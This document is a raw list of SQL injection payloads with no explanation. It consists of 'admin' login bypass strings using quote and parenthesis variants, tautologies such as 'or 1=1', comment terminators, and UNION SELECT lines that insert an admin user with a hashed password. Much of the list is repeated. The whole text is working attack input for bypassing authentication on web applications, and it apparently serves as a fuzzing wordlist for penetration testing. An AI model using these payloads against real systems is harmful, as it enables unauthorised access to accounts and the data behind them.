 or 22=22
 or 22=22--
 or 24=24#
 or 24=24/*
 and 22=22
 and 22=22--
 and 24=24#
 and 24=24/*
 having 2=2
 order by 1-- 
 admin'--
 admin'#
 admin'/*
 admin' or '1'='1
 admin' or '1'='1'--
 admin' or '1'='1'#
 admin' or '1'='1'/*
 admin' or 1=1 or ''='
 admin' or 101=101
 admin' or 1=1--
 admin' or 1=1#
 admin' or 1=1/*
 admin') or ('1'='1
 admin') or ('1'='1'--
 admin') or ('1'='1'#
 admin') or ('1'='1'/*
 admin') or '1'='1
 admin') or '1'='1'--
 admin') or '1'='1'#
 admin') or '1'='1'/*
 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
 admin" --
 admin" #
 admin"/*
 admin" or "1"="1
 admin" or "1"="1"--
 admin" or "1"="1"#
 admin" or "1"="1"/*
 admin"or 1=1 or ""="
 admin" or 1=1
 admin" or 1=1--
 admin" or 1=1#
 admin" or 1=1/*
 admin") or ("1"="1
 admin") or ("1"="1"--
 admin") or ("1"="1"#
 admin") or ("1"="1"/*
 admin") or "1"="1
 admin") or "1"="1"--
 admin") or "1"="1"#
 admin") or "1"="1"/*
 1234" AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
 1234' AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
 admin")) or ("1"="1
 admin")) or ("1"="1"--
 admin")) or ("1"="1"#
 admin")) or ("1"="1"/*
 admin")) or "1"="1
 admin")) or "1"="1"--
 admin")) or "1"="1"#
 admin")) or "1"="1"/*
 admin'--
 admin'#
 admin'/*
 admin' or '1'='1
 admin' or '1'='1'--
 admin' or '1'='1'#
 admin' or '1'='1'/*
 admin' or 1=1 or ''='
 admin' or 101=101
 admin' or 1=1--
 admin' or 1=1#
 admin' or 1=1/*
 admin') or ('1'='1
 admin') or ('1'='1'--
 admin') or ('1'='1'#
 admin') or ('1'='1'/*
 admin') or '1'='1
 admin') or '1'='1'--
 admin') or '1'='1'#
 admin') or '1'='1'/*
 1234' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
 admin" --
 admin" #
 admin"/*
 admin" or "1"="1
 admin" or "1"="1"--
 admin" or "1"="1"#
 admin" or "1"="1"/*
 admin"or 1=1 or ""="
 admin" or 1=1
 admin" or 1=1--
 admin" or 1=1#
 admin" or 1=1/*
 admin") or ("1"="1
 admin") or ("1"="1"--
 admin") or ("1"="1"#
 admin") or ("1"="1"/*
 admin") or "1"="1
 admin") or "1"="1"--
 admin") or "1"="1"#
 admin") or "1"="1"/*
 1234" AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
 admin")) or ("1"="1
 admin")) or ("1"="1"--
 admin")) or ("1"="1"#
 admin")) or ("1"="1"/*
 admin")) or "1"="1
 admin")) or "1"="1"--
 admin")) or "1"="1"#
 admin")) or "1"="1"/*
